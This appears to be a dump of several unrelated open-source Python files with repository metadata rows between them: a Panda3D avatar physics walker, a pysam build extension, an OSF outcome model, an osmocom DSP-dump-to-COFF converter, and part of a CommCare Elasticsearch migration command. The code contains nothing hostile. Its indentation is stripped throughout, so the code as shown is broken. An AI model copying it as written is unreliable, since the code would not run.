contactIndicatorNode.setPos(self.avatarNodePath, 0.0, 0.0, 5.0)
contactIndicatorNode.setColor(1.0, 0.0, 0.0, 1.0)
indicator.instanceTo(contactIndicatorNode)
self.physContactIndicator=contactIndicatorNode
else:
print("failed load of physics indicator")
def avatarPhysicsIndicator(self, task):
#assert self.debugPrint("avatarPhysicsIndicator()")
# Velocity:
self.physVelocityIndicator.setPos(self.avatarNodePath, 0.0, 0.0, 6.0)
physObject=self.actorNode.getPhysicsObject()
a=physObject.getVelocity()
self.physVelocityIndicator.setScale(math.sqrt(a.length()))
a+=self.physVelocityIndicator.getPos()
self.physVelocityIndicator.lookAt(Point3(a))
# Contact:
contact=self.actorNode.getContactVector()
if contact==Vec3.zero():
self.physContactIndicator.hide()
else:
self.physContactIndicator.show()
self.physContactIndicator.setPos(self.avatarNodePath, 0.0, 0.0, 5.0)
#contact=self.actorNode.getContactVector()
point=Point3(contact+self.physContactIndicator.getPos())
self.physContactIndicator.lookAt(point)
return Task.cont
def deleteCollisions(self):
assert self.debugPrint("deleteCollisions()")
del self.cTrav
if self.useHeightRay:
del self.cRayQueue
self.cRayNodePath.removeNode()
del self.cRayNodePath
del self.cSphere
self.cSphereNodePath.removeNode()
del self.cSphereNodePath
del self.pusher
del self.getAirborneHeight
def setCollisionsActive(self, active = 1):
assert self.debugPrint("collisionsActive(active=%s)"%(active,))
if self.collisionsActive != active:
self.collisionsActive = active
if active:
self.cTrav.addCollider(self.cSphereNodePath, self.pusher)
if self.useHeightRay:
if self.useLifter:
self.cTrav.addCollider(self.cRayNodePath, self.lifter)
else:
self.cTrav.addCollider(self.cRayNodePath, self.cRayQueue)
else:
self.cTrav.removeCollider(self.cSphereNodePath)
if self.useHeightRay:
self.cTrav.removeCollider(self.cRayNodePath)
# Now that we have disabled collisions, make one more pass
# right now to ensure we aren't standing in a wall.
self.oneTimeCollide()
def getCollisionsActive(self):
assert self.debugPrint(
"getCollisionsActive() returning=%s"%(
self.collisionsActive,))
return self.collisionsActive
def placeOnFloor(self):
"""
Make a reasonable effort to place the avatar on the ground.
For example, this is useful when switching away from the
current walker.
"""
self.oneTimeCollide()
self.avatarNodePath.setZ(self.avatarNodePath.getZ()-self.getAirborneHeight())
def oneTimeCollide(self):
"""
Makes one quick collision pass for the avatar, for instance as
a one-time straighten-things-up operation after collisions
have been disabled.
"""
assert self.debugPrint("oneTimeCollide()")
tempCTrav = CollisionTraverser("oneTimeCollide")
if self.useHeightRay:
if self.useLifter:
tempCTrav.addCollider(self.cRayNodePath, self.lifter)
else:
tempCTrav.addCollider(self.cRayNodePath, self.cRayQueue)
tempCTrav.traverse(render)
def addBlastForce(self, vector):
pass
def displayDebugInfo(self):
"""
For debug use.
"""
onScreenDebug.add("w controls", "PhysicsWalker")
if self.useLifter:
onScreenDebug.add("w airborneHeight", self.lifter.getAirborneHeight())
onScreenDebug.add("w isOnGround", self.lifter.isOnGround())
#onScreenDebug.add("w gravity", self.lifter.getGravity())
onScreenDebug.add("w contact normal", self.lifter.getContactNormal().pPrintValues())
onScreenDebug.add("w impact", self.lifter.getImpactVelocity())
onScreenDebug.add("w velocity", self.lifter.getVelocity())
onScreenDebug.add("w hasContact", self.lifter.hasContact())
#onScreenDebug.add("w falling", self.falling)
#onScreenDebug.add("w jumpForce", self.avatarControlJumpForce)
#onScreenDebug.add("w mayJump", self.mayJump)
onScreenDebug.add("w isAirborne", self.isAirborne)
def handleAvatarControls(self, task):
"""
Check on the arrow keys and update the avatar.
"""
if __debug__:
if self.wantDebugIndicator:
onScreenDebug.append("localAvatar pos = %s\n"%(base.localAvatar.getPos().pPrintValues(),))
onScreenDebug.append("localAvatar h = % 10.4f\n"%(base.localAvatar.getH(),))
onScreenDebug.append("localAvatar anim = %s\n"%(base.localAvatar.animFSM.getCurrentState().getName(),))
#assert self.debugPrint("handleAvatarControls(task=%s)"%(task,))
physObject=self.actorNode.getPhysicsObject()
#rotAvatarToPhys=Mat3.rotateMatNormaxis(-self.avatarNodePath.getH(), Vec3.up())
#rotPhysToAvatar=Mat3.rotateMatNormaxis(self.avatarNodePath.getH(), Vec3.up())
contact=self.actorNode.getContactVector()
# hack fix for falling through the floor:
if contact==Vec3.zero() and self.avatarNodePath.getZ()<-50.0:
# DCR: don't reset X and Y; allow player to move
self.reset()
self.avatarNodePath.setZ(50.0)
messenger.send("walkerIsOutOfWorld", [self.avatarNodePath])
if self.wantDebugIndicator:
self.displayDebugInfo()
# get the button states:
forward = inputState.isSet("forward")
reverse = inputState.isSet("reverse")
turnLeft = inputState.isSet("turnLeft")
turnRight = inputState.isSet("turnRight")
slide = 0#inputState.isSet("slide")
slideLeft = 0#inputState.isSet("slideLeft")
slideRight = 0#inputState.isSet("slideRight")
jump = inputState.isSet("jump")
# Check for Auto-Run
if base.localAvatar.getAutoRun():
forward = 1
reverse = 0
# Determine what the speeds are based on the buttons:
self.__speed=(forward and self.avatarControlForwardSpeed or
reverse and -self.avatarControlReverseSpeed)
avatarSlideSpeed=self.avatarControlForwardSpeed*0.5
#self.__slideSpeed=slide and (
# (turnLeft and -avatarSlideSpeed) or
# (turnRight and avatarSlideSpeed))
self.__slideSpeed=(
(slideLeft and -avatarSlideSpeed) or
(slideRight and avatarSlideSpeed))
self.__rotationSpeed=not slide and (
(turnLeft and self.avatarControlRotateSpeed) or
(turnRight and -self.avatarControlRotateSpeed))
# How far did we move based on the amount of time elapsed?
dt=ClockObject.getGlobalClock().getDt()
if self.needToDeltaPos:
self.setPriorParentVector()
self.needToDeltaPos = 0
#self.__oldPosDelta = render.getRelativeVector(
# self.avatarNodePath,
# self.avatarNodePath.getPosDelta(render))
#self.__oldPosDelta = self.avatarNodePath.getRelativeVector(
# render,
# self.avatarNodePath.getPosDelta(render))
self.__oldPosDelta = self.avatarNodePath.getPosDelta(render)
self.__oldDt = dt
#posDelta = self.avatarNodePath.getPosDelta(render)
#if posDelta==Vec3.zero():
# self.priorParent.setVector(self.__oldPosDelta)
#else:
# self.priorParent.setVector(Vec3.zero())
# # We must copy the vector to preserve it:
# self.__oldPosDelta=Vec3(posDelta)
if __debug__:
if self.wantDebugIndicator:
onScreenDebug.add("posDelta1",
self.avatarNodePath.getPosDelta(render).pPrintValues())
#onScreenDebug.add("posDelta3",
# render.getRelativeVector(
# self.avatarNodePath,
# self.avatarNodePath.getPosDelta(render)).pPrintValues())
#onScreenDebug.add("gravity",
# self.gravity.getLocalVector().pPrintValues())
#onScreenDebug.add("priorParent",
# self.priorParent.getLocalVector().pPrintValues())
#onScreenDebug.add("avatarViscosity",
# "% 10.4f"%(self.avatarViscosity.getCoef(),))
#
#onScreenDebug.add("physObject pos",
# physObject.getPosition().pPrintValues())
#onScreenDebug.add("physObject hpr",
# physObject.getOrientation().getHpr().pPrintValues())
#onScreenDebug.add("physObject orien",
# physObject.getOrientation().pPrintValues())
onScreenDebug.add("physObject vel",
physObject.getVelocity().pPrintValues())
onScreenDebug.add("physObject len",
"% 10.4f"%physObject.getVelocity().length())
#onScreenDebug.add("posDelta4",
# self.priorParentNp.getRelativeVector(
# render,
# self.avatarNodePath.getPosDelta(render)).pPrintValues())
onScreenDebug.add("priorParent",
self.priorParent.getLocalVector().pPrintValues())
#onScreenDebug.add("priorParent po",
# self.priorParent.getVector(physObject).pPrintValues())
#onScreenDebug.add("__posDelta",
# self.__oldPosDelta.pPrintValues())
onScreenDebug.add("contact",
contact.pPrintValues())
#onScreenDebug.add("airborneHeight", "% 10.4f"%(
# self.getAirborneHeight(),))
#onScreenDebug.add("__oldContact",
# contact.pPrintValues())
#onScreenDebug.add("__oldAirborneHeight", "% 10.4f"%(
# self.getAirborneHeight(),))
airborneHeight = self.getAirborneHeight()
if airborneHeight > self.highMark:
self.highMark = airborneHeight
if __debug__:
onScreenDebug.add("highMark", "% 10.4f"%(self.highMark,))
#if airborneHeight < 0.1: #contact!=Vec3.zero():
if (airborneHeight > self.avatarRadius*0.5
or physObject.getVelocity().getZ() > 0.0
): # Check stair angles before changing this.
# ...the avatar is airborne (maybe a lot or a tiny amount).
self.isAirborne = 1
else:
# ...the avatar is very close to the ground (close enough to be
# considered on the ground).
if self.isAirborne and physObject.getVelocity().getZ() <= 0.0:
# ...the avatar has landed.
contactLength = contact.length()
if contactLength>self.__hardLandingForce:
#print "jumpHardLand"
messenger.send("jumpHardLand")
else:
#print "jumpLand"
messenger.send("jumpLand")
self.priorParent.setVector(Vec3.zero())
self.isAirborne = 0
elif jump:
#print "jump"
#self.__jumpButton = 0
messenger.send("jumpStart")
                ## ...jump away from walls and with the slope normal.
#jumpVec=Vec3(contact+Vec3.up())
##jumpVec=Vec3(rotAvatarToPhys.xform(jumpVec))
#jumpVec.normalize()
# ...jump straight up, even if next to a wall.
jumpVec=Vec3.up()
jumpVec *= self.avatarControlJumpForce
physObject.addImpulse(Vec3(jumpVec))
self.isAirborne = 1 # Avoid double impulse before fully airborne.
else:
self.isAirborne = 0
if __debug__:
onScreenDebug.add("isAirborne", "%d"%(self.isAirborne,))
if contact != self.__oldContact:
# We must copy the vector to preserve it:
self.__oldContact = Vec3(contact)
self.__oldAirborneHeight = airborneHeight
moveToGround = Vec3.zero()
if not self.useHeightRay or self.isAirborne:
# ...the airborne check is a hack to stop sliding.
self.phys.doPhysics(dt)
if __debug__:
onScreenDebug.add("phys", "on")
else:
physObject.setVelocity(Vec3.zero())
#if airborneHeight>0.001 and contact==Vec3.zero():
# moveToGround = Vec3(0.0, 0.0, -airborneHeight)
#moveToGround = Vec3(0.0, 0.0, -airborneHeight)
moveToGround = Vec3(0.0, 0.0, -self.determineHeight())
if __debug__:
onScreenDebug.add("phys", "off")
# Check to see if we're moving at all:
if self.__speed or self.__slideSpeed or self.__rotationSpeed or moveToGround!=Vec3.zero():
distance = dt * self.__speed
slideDistance = dt * self.__slideSpeed
rotation = dt * self.__rotationSpeed
#debugTempH=self.avatarNodePath.getH()
assert self.avatarNodePath.getQuat().isSameDirection(physObject.getOrientation())
assert self.avatarNodePath.getPos().almostEqual(physObject.getPosition(), 0.0001)
# update pos:
# Take a step in the direction of our previous heading.
self.__vel=Vec3(
Vec3.forward() * distance +
Vec3.right() * slideDistance)
# rotMat is the rotation matrix corresponding to
# our previous heading.
rotMat=Mat3.rotateMatNormaxis(self.avatarNodePath.getH(), Vec3.up())
step=rotMat.xform(self.__vel)
physObject.setPosition(Point3(
physObject.getPosition()+step+moveToGround))
# update hpr:
o=physObject.getOrientation()
r=LRotationf()
r.setHpr(Vec3(rotation, 0.0, 0.0))
physObject.setOrientation(o*r)
# sync the change:
self.actorNode.updateTransform()
assert self.avatarNodePath.getQuat().isSameDirection(physObject.getOrientation())
assert self.avatarNodePath.getPos().almostEqual(physObject.getPosition(), 0.0001)
#assert self.avatarNodePath.getH()==debugTempH-rotation
messenger.send("avatarMoving")
else:
self.__vel.set(0.0, 0.0, 0.0)
# Clear the contact vector so we can tell if we contact something next frame:
self.actorNode.setContactVector(Vec3.zero())
return Task.cont
def doDeltaPos(self):
assert self.debugPrint("doDeltaPos()")
self.needToDeltaPos = 1
def setPriorParentVector(self):
assert self.debugPrint("doDeltaPos()")
print("self.__oldDt %s self.__oldPosDelta %s" % (self.__oldDt, self.__oldPosDelta))
if __debug__:
onScreenDebug.add("__oldDt", "% 10.4f"%self.__oldDt)
onScreenDebug.add("self.__oldPosDelta",
self.__oldPosDelta.pPrintValues())
velocity = self.__oldPosDelta*(1/self.__oldDt)*4.0 # *4.0 is a hack
assert self.debugPrint(" __oldPosDelta=%s"%(self.__oldPosDelta,))
assert self.debugPrint(" velocity=%s"%(velocity,))
self.priorParent.setVector(Vec3(velocity))
if __debug__:
if self.wantDebugIndicator:
onScreenDebug.add("velocity", velocity.pPrintValues())
def reset(self):
assert self.debugPrint("reset()")
self.actorNode.getPhysicsObject().resetPosition(self.avatarNodePath.getPos())
self.priorParent.setVector(Vec3.zero())
self.highMark = 0
self.actorNode.setContactVector(Vec3.zero())
if __debug__:
contact=self.actorNode.getContactVector()
onScreenDebug.add("priorParent po",
self.priorParent.getVector(self.actorNode.getPhysicsObject()).pPrintValues())
onScreenDebug.add("highMark", "% 10.4f"%(self.highMark,))
onScreenDebug.add("contact", contact.pPrintValues())
def getVelocity(self):
physObject=self.actorNode.getPhysicsObject()
return physObject.getVelocity()
def enableAvatarControls(self):
"""
Activate the arrow keys, etc.
"""
assert self.debugPrint("enableAvatarControls()")
assert self.collisionsActive
if __debug__:
#self.accept("control-f3", self.spawnTest) #*#
self.accept("f3", self.reset) # for debugging only.
taskName = "AvatarControls-%s"%(id(self),)
# remove any old
taskMgr.remove(taskName)
# spawn the new task
taskMgr.add(self.handleAvatarControls, taskName, 25)
if self.physVelocityIndicator:
taskMgr.add(self.avatarPhysicsIndicator, "AvatarControlsIndicator%s"%(id(self),), 35)
def disableAvatarControls(self):
"""
Ignore the arrow keys, etc.
"""
assert self.debugPrint("disableAvatarControls()")
taskName = "AvatarControls-%s"%(id(self),)
taskMgr.remove(taskName)
taskName = "AvatarControlsIndicator%s"%(id(self),)
taskMgr.remove(taskName)
if __debug__:
self.ignore("control-f3") #*#
self.ignore("f3")
def flushEventHandlers(self):
if hasattr(self, 'cTrav'):
if self.useLifter:
self.lifter.flush() # not currently defined or needed
self.pusher.flush()
if __debug__:
def setupAvatarPhysicsIndicator(self):
if self.wantDebugIndicator:
indicator = base.loader.loadModel('phase_5/models/props/dagger')
#self.walkControls.setAvatarPhysicsIndicator(indicator)
def debugPrint(self, message):
"""for debugging"""
return self.notify.debug(
str(id(self))+' '+message)
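# Rough wiring sketch for this walker. The traverser, avatar NodePath, bitmasks
# and speed values are placeholders supplied by the surrounding application,
# not taken from this module:
#   walker = PhysicsWalker(gravity=-32.1740)
#   walker.setWalkSpeed(forward=16.0, jump=24.0, reverse=8.0, rotate=80.0)
#   walker.initializeCollisions(cTrav, avatarNodePath, wallBitmask, floorBitmask)
#   walker.setAirborneHeightFunc(walker.determineHeight)
#   walker.enableAvatarControls()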
|
f534a9d5cbe984ba96b8541140a5bfec670cdb3f
|
ff477a586b946c575441b6189123ab86c175e5ae
|
/linker_tests/link_pre_489/cy_build.py
|
d741d4947a62d0aaeddf36fa7d958223c8d30ccc
|
[
"MIT"
] |
permissive
|
pysam-developers/pysam
|
5552e4903106fc253869a405f4a2c068c6bd65c5
|
0663ca85739877e5dd05c0eb2512a8bcaa515b39
|
refs/heads/master
| 2023-08-16T19:10:17.566296
| 2023-08-15T10:06:59
| 2023-08-15T12:28:29
| 16,557,526
| 678
| 332
|
MIT
| 2023-09-14T10:40:22
| 2014-02-05T20:38:10
|
C
|
UTF-8
|
Python
| false
| false
| 3,012
|
py
|
cy_build.py
|
import os
import re
import sys
try:
from Cython.Distutils import build_ext
except ImportError:
from setuptools.command.build_ext import build_ext
from distutils.extension import Extension
from distutils.sysconfig import get_config_var, get_config_vars, get_python_lib, get_python_version
from pkg_resources import Distribution
if sys.platform == 'darwin':
config_vars = get_config_vars()
config_vars['LDSHARED'] = config_vars['LDSHARED'].replace('-bundle', '')
config_vars['SHLIB_EXT'] = '.so'
def is_pip_install():
if "_" in os.environ and os.environ["_"].endswith("pip"):
return True
if "pip-egg-info" in sys.argv:
return True
if re.search("/pip-.*-build/", __file__):
return True
return False
class CyExtension(Extension):
def __init__(self, *args, **kwargs):
self._init_func = kwargs.pop("init_func", None)
Extension.__init__(self, *args, **kwargs)
def extend_includes(self, includes):
self.include_dirs.extend(includes)
def extend_macros(self, macros):
self.define_macros.extend(macros)
def extend_extra_objects(self, objs):
self.extra_objects.extend(objs)
class cy_build_ext(build_ext):
def _get_egg_name(self):
ei_cmd = self.get_finalized_command("egg_info")
return Distribution(
None, None, ei_cmd.egg_name, ei_cmd.egg_version, get_python_version(),
self.distribution.has_ext_modules() and self.plat_name).egg_name()
def build_extension(self, ext):
if isinstance(ext, CyExtension) and ext._init_func:
ext._init_func(ext)
if not self.inplace:
ext.library_dirs.append(os.path.join(self.build_lib, "pysam"))
if sys.platform == 'darwin':
# The idea is to give shared libraries an install name of the form
# `@rpath/<library-name.so>`, and to set the rpath equal to
# @loader_path. This will allow Python packages to find the library
# in the expected place, while still giving enough flexibility to
# external applications to link against the library.
relative_module_path = ext.name.replace(".", os.sep) + (get_config_var('EXT_SUFFIX') or get_config_var('SO'))
library_path = os.path.join(
"@rpath", os.path.basename(relative_module_path)
)
if not ext.extra_link_args:
ext.extra_link_args = []
ext.extra_link_args += ['-dynamiclib',
'-rpath', '@loader_path',
'-Wl,-headerpad_max_install_names',
'-Wl,-install_name,%s' % library_path,
'-Wl,-x']
else:
if not ext.extra_link_args:
ext.extra_link_args = []
ext.extra_link_args += ['-Wl,-rpath,$ORIGIN']
build_ext.build_extension(self, ext)
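# Typical hook-up in a setup.py, sketched from the classes above; the extension
# and source file names are placeholders:
#   from setuptools import setup
#   setup(
#       ext_modules=[CyExtension("pkg.ext_name", ["pkg/ext_name.pyx"])],
#       cmdclass={"build_ext": cy_build_ext},
#   )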
|
a16dd10ac0a34e876ac4ffbdcea79f2a2fbff425
|
3c41443364da8b44c74dce08ef94a1acd1b66b3e
|
/osf/models/outcomes.py
|
8a6c901cb11851bcc92d991635dbbea31a522025
|
[
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-warranty-disclaimer",
"AGPL-3.0-only",
"LGPL-2.0-or-later",
"LicenseRef-scancode-proprietary-license",
"MPL-1.1",
"CPAL-1.0",
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause",
"Apache-2.0"
] |
permissive
|
CenterForOpenScience/osf.io
|
71d9540be7989f7118a33e15bc4a6ce2d2492ac1
|
a3e0a0b9ddda5dd75fc8248d58f3bcdeece0323e
|
refs/heads/develop
| 2023-09-04T03:21:14.970917
| 2023-08-31T14:49:20
| 2023-08-31T14:49:20
| 10,199,599
| 683
| 390
|
Apache-2.0
| 2023-09-14T17:07:52
| 2013-05-21T15:53:37
|
Python
|
UTF-8
|
Python
| false
| false
| 3,307
|
py
|
outcomes.py
|
'''
This module defines the Outcome model and its custom manager.
Outcomes serve as a way to collect metadata about a research effort and to aggregate Identifiers
used to share data or provide context for that research effort, along with some additional metadata
stored in the OutcomeArtifact through table.
'''
from django.db import models
from django.utils.functional import cached_property
from osf.exceptions import NoPIDError
from osf.models.base import BaseModel, ObjectIDMixin
from osf.models.mixins import EditableFieldsMixin
from osf.models.nodelog import NodeLog
from osf.utils.outcomes import ArtifactTypes, OutcomeActions
NODE_LOGS_FOR_OUTCOME_ACTION = {
OutcomeActions.ADD: NodeLog.RESOURCE_ADDED,
OutcomeActions.UPDATE: NodeLog.RESOURCE_UPDATED,
OutcomeActions.REMOVE: NodeLog.RESOURCE_REMOVED,
}
class OutcomeManager(models.Manager):
def for_registration(self, registration, identifier_type='doi', create=False, **kwargs):
registration_identifier = registration.get_identifier(category=identifier_type)
if not registration_identifier:
raise NoPIDError(f'Provided registration has no PID of type {identifier_type}')
primary_artifact = registration_identifier.artifact_metadata.filter(
artifact_type=ArtifactTypes.PRIMARY.value
).order_by('-created').first()
if primary_artifact:
return primary_artifact.outcome
elif not create:
return None
new_outcome = self.create(**kwargs)
new_outcome.copy_editable_fields(registration, include_contributors=False)
new_outcome.artifact_metadata.create(
identifier=registration_identifier,
artifact_type=ArtifactTypes.PRIMARY,
finalized=True,
)
return new_outcome
class Outcome(ObjectIDMixin, EditableFieldsMixin, BaseModel):
# The following fields are inherited from ObjectIdMixin
# _id (CharField)
# The following fields are inherited from BaseModel
# created (DateTimeField)
# modified (DateTimeField)
# The following fields inherited from EditableFieldsMixin:
# title (TextField)
# description (TextField)
# category (CharField)
# tags (Tags, M2M)
# subjects (Subjects, M2M)
# These override the fields inherited from EditableField Mixin
# This is required to avoid collisions with the related_name
affiliated_institutions = models.ManyToManyField('Institution', related_name='outcomes')
node_license = models.ForeignKey(
'NodeLicenseRecord',
related_name='outcomes',
on_delete=models.SET_NULL,
null=True,
blank=True
)
artifacts = models.ManyToManyField('osf.Identifier', through='osf.OutcomeArtifact')
objects = OutcomeManager()
@cached_property
def primary_osf_resource(self):
return self.artifact_metadata.get(artifact_type=ArtifactTypes.PRIMARY).identifier.referent
def artifact_updated(self, action, artifact, api_request, **log_params):
nodelog_params = {'artifact_id': artifact._id, **log_params}
self.primary_osf_resource.related_resource_updated(
log_action=NODE_LOGS_FOR_OUTCOME_ACTION.get(action),
api_request=api_request,
**nodelog_params,
)
|
68fb4ac65cbd817a2aac15d60b86986d69a81230
|
47582a78f9861642308b084418815a43b07249f5
|
/src/target_dsp/calypso/dump2coff.py
|
17ff9fafae6078af6fd436a8f015f668eda7a237
|
[] |
no_license
|
osmocom/osmocom-bb
|
836de24bc9ac3bd2ce6081a865be205d9378415d
|
8bbd0d173fad3708fac3207d56dd04c14912351e
|
refs/heads/master
| 2023-08-17T00:37:09.746676
| 2023-08-10T12:25:34
| 2023-08-10T12:28:06
| 6,985,130
| 260
| 134
| null | 2019-02-16T07:17:07
| 2012-12-03T16:08:08
|
C
|
UTF-8
|
Python
| false
| false
| 6,529
|
py
|
dump2coff.py
|
#!/usr/bin/env python
import re
import sys
import struct
DATA = 0
CODE = 1
class Section(object):
DATA = 0
CODE = 1
STYP_NOLOAD = 0x0002
STYP_TEXT = 0x0020
STYP_DATA = 0x0040
STYP_BSS = 0x0080
def __init__(self, name, type, start, size, data=None):
self.name = name
self.type = type
self.start = start
self.size = size
self.data = data
@property
def flags(self):
if self.type == Section.DATA:
return Section.STYP_DATA if self.data else Section.STYP_BSS
else:
return Section.STYP_TEXT if self.data else Section.STYP_NOLOAD
class CalypsoCOFF(object):
F_RELFLG = 0x0001 # Relocation information stripped from the file
F_EXEC = 0x0002 # File is executable (i.e., no unresolved external references)
F_LNNO = 0x0004 # Line numbers stripped from the file
F_LSYMS = 0x0010 # Local symbols stripped from the file
F_LITTLE = 0x0100 # Little endian
def __init__(self, data_seg_base=0x80000000):
self.sections = {}
self.data_seg_base = data_seg_base
self.ver_magic = 0x00c1
self.tgt_magic = 0x0098
self.flags = \
CalypsoCOFF.F_RELFLG | \
CalypsoCOFF.F_EXEC | \
CalypsoCOFF.F_LNNO | \
CalypsoCOFF.F_LSYMS | \
CalypsoCOFF.F_LITTLE
def _data_pack(self, d):
return ''.join(struct.pack('<H', x) for x in d)
def save(self, filename):
# Formats
HDR_FILE = '<HHlllHHH'
HDR_SECTIONS = '<8sLLllllHHHcc'
# Optional header
oh = ''
# File header
fh = struct.pack(HDR_FILE,
self.ver_magic, # unsigned short f_ver_magic; /* version magic number */
len(self.sections), # unsigned short f_nscns; /* number of section */
0, # long f_timdat; /* time and date stamp */
0, # long f_symptr; /* file ptr to symbol table */
0, # long f_nsyms; /* number entries in the sym table */
len(oh), # unsigned short f_opthdr; /* size of optional header */
self.flags, # unsigned short f_flags; /* flags */
self.tgt_magic, # unsigned short f_tgt_magic; /* target magic number */
)
# File header size + #sections * sizeof(section header)
dptr = struct.calcsize(HDR_FILE) + len(oh) + len(self.sections) * struct.calcsize(HDR_SECTIONS)
# Section headers
sh = []
sd = []
sk = lambda x: self.data_seg_base + x.start if x.type==Section.DATA else x.start
for s in sorted(self.sections.values(), key=sk):
# Values
if s.type == Section.DATA:
mp = 0x80
sa = s.start
else:
mp = 0
sa = s.start
sptr = dptr if s.data else 0
# Header
sh.append(struct.pack(HDR_SECTIONS,
s.name, # char[8] s_name; /* 8-character null padded section name */
sa, # long int s_paddr; /* Physical address of section */
sa, # long int s_vaddr; /* Virtual address of section */
s.size, # long int s_size; /* Section size in bytes */
sptr, # long int s_scnptr; /* File pointer to raw data */
0, # long int s_relptr; /* File pointer to relocation entries */
0, # long int s_lnnoptr;/* File pointer to line number entries */
0, # unsigned short s_nreloc; /* Number of relocation entries */
0, # unsigned short s_nlnno; /* Number of line number entries */
s.flags,# unsigned short s_flags; /* Flags (see ``Section header flags'') */
'\x00', # /
chr(mp),# char s_mempage;/* Memory page number */
))
# Data
if s.data:
sd.append(self._data_pack(s.data))
dptr += s.size * 2
# Write the thing
f = open(filename, 'wb')
f.write(fh)
f.write(oh)
f.write(''.join(sh))
f.write(''.join(sd))
f.close()
def add_section(self, name, type, addr, size, data=None):
self.sections[name] = Section(name, type, addr, size, data=data)
# ----------------------------------------------------------------------------
# Dump loading
# ----------------------------------------------------------------------------
RE_DUMP_HDR = re.compile(
r"^DSP dump: (\w*) \[([0-9a-fA-F]{5})-([0-9a-fA-F]{5})\]$"
)
def _file_strip_gen(f):
while True:
l = f.readline()
if not l:
return
yield l.strip()
def dump_load_section(fg, sa, ea):
data = []
ca = sa
for l in fg:
if not l:
break
ra = int(l[0:5], 16)
if ra != ca:
            raise ValueError('Invalid dump address %05x != %05x' % (ra, ca))
v = l[8:].split()
if len(v) != 16:
raise ValueError('Invalid dump format')
v = [int(x,16) for x in v]
data.extend(v)
ca += 0x10
if ca != ea:
        raise ValueError('Missing dump data %05x != %05x' % (ra, ea))
return data
def dump_load(filename):
# Open file
f = open(filename, 'r')
fg = _file_strip_gen(f)
# Scan line by line for a dump header line
sections = []
for l in fg:
m = RE_DUMP_HDR.match(l)
if not m:
continue
name = m.group(1)
sa = int(m.group(2), 16)
ea = int(m.group(3), 16) + 1
sections.append((
name, sa, ea,
dump_load_section(fg, sa, ea),
))
# Done
f.close()
return sections
# ----------------------------------------------------------------------------
# Main
# ----------------------------------------------------------------------------
def main(pname, dump_filename, out_filename):
# Section to place in the COFF
sections = [
# name type start size
('.regs', Section.DATA, 0x00000, 0x0060),
('.scratch', Section.DATA, 0x00060, 0x0020),
('.drom', Section.DATA, 0x09000, 0x5000),
('.pdrom', Section.CODE, 0x0e000, 0x2000),
('.prom0', Section.CODE, 0x07000, 0x7000),
('.prom1', Section.CODE, 0x18000, 0x8000),
('.prom2', Section.CODE, 0x28000, 0x8000),
('.prom3', Section.CODE, 0x38000, 0x2000),
('.daram0', Section.DATA, 0x00080, 0x0780),
('.api', Section.DATA, 0x00800, 0x2000),
('.daram1', Section.DATA, 0x02800, 0x4800),
]
# COFF name -> dump name
dump_mapping = {
# '.regs' : 'Registers',
'.drom' : 'DROM',
'.pdrom' : 'PDROM',
'.prom0' : 'PROM0',
'.prom1' : 'PROM1',
'.prom2' : 'PROM2',
'.prom3' : 'PROM3',
}
# Load the dump
dump_sections = dict([(s[0], s) for s in dump_load(dump_filename)])
# Create the COFF
coff = CalypsoCOFF()
# Add each section (with data if we have some)
for name, type, start, size in sections:
# Dumped data ?
d_data = None
if (name in dump_mapping) and (dump_mapping[name] in dump_sections):
d_name, d_sa, d_ea, d_data = dump_sections[dump_mapping[name]]
# Add sections
coff.add_section(name, type, start, size, d_data)
# Save result
coff.save(out_filename)
return 0
if __name__ == '__main__':
sys.exit(main(*sys.argv))
|
a7eb2c52f6ee581a4b20b005a69103577fcfe6cc
|
578db86c51d44ebddd0dc7b1738985b3dc69eb74
|
/corehq/apps/es/management/commands/make_elastic_migration.py
|
0e5da237b075093cfa52f49d9a36ba304b1178c7
|
[
"BSD-3-Clause"
] |
permissive
|
dimagi/commcare-hq
|
a43c7dd32b5f89c89fd5aa1b1359ab7301f4ff6b
|
e7391ddae1af1dbf118211ecb52c83fc508aa656
|
refs/heads/master
| 2023-08-16T22:38:27.853437
| 2023-08-16T19:07:19
| 2023-08-16T19:07:19
| 247,278
| 499
| 203
|
BSD-3-Clause
| 2023-09-14T19:03:24
| 2009-07-09T17:00:07
|
Python
|
UTF-8
|
Python
| false
| false
| 9,856
|
py
|
make_elastic_migration.py
|
from argparse import ArgumentTypeError
from datetime import datetime
from django.core.management.base import CommandError
from django.db.migrations import Migration
from corehq.apps.es.migration_operations import (
CreateIndex,
DeleteIndex,
UpdateIndexMapping,
)
from corehq.apps.es.transient_util import (
iter_index_cnames,
doc_adapter_from_cname,
)
from hqscripts.management.commands import makemigrations
class Command(makemigrations.Command):
DJANGO_APP_LABEL = "es"
help = "Creates a new migration for modifying Elasticsearch index(es)."
def add_arguments(self, parser):
super().add_arguments(parser)
parser.add_argument(
"-c", "--create", metavar="CNAME[:NEW_INDEX_NAME]", dest="creates",
default=[], type=self.adapter_and_name_type, action="append", help=(
"Add a CreateIndex operation for index with canonical name "
"CNAME. Use the optional ':NEW_INDEX_NAME' suffix to specify "
"a name to use for the new index. The -c/--create option may "
"be specified multiple times."
),
)
parser.add_argument(
"-u", "--update", metavar="CNAME[:PROPERTY[,PROPERTY ...]]",
dest="updates", default=[], type=self.adapter_and_properties_type,
action="append", help=(
"Add an UpdateIndexMapping operation for index with canonical "
"name CNAME. Use the optional ':PROPERTY,...' suffix to "
"specify which properties to update, omitting this suffix will "
"update all properties. The -u/--update option may be "
"specified multiple times."
),
)
parser.add_argument(
"-d", "--delete", metavar="INDEX", dest="deletes", default=[],
action="append", help=(
"Add a DeleteIndex operation for the index with exact name "
"%(metavar)s. The -d/--delete option may be specified multiple "
"times."
),
)
def handle(self, creates, updates, deletes, **options):
# CLI argument values explicitly required by this custom handler
self.empty = options["empty"]
# self.migration_name is also required by 'write_migration_files()'
self.migration_name = options["name"]
# abort early if a migration name is provided but is invalid
if self.migration_name and not self.migration_name.isidentifier():
raise CommandError("The migration name must be a valid Python identifier.")
# create the new migration object and its Elastic migration operations
migration = self.build_migration(creates, updates, deletes)
# perform makemigrations boilerplate to build the changes collection
changes = self.arrange_migration_changes(migration)
# CLI argument values that are only required for the super class(es)
# 'write_migration_files()' method to work nominally.
self.dry_run = options["dry_run"]
self.verbosity = options["verbosity"]
self.include_header = options["include_header"]
self.lock_path = options["lock_path"]
# write the new migration file
self.write_migration_files(changes)
def build_migration(self, creates, updates, deletes):
"""Returns a Migration instance with an operations list for each of the
provided operation collections.
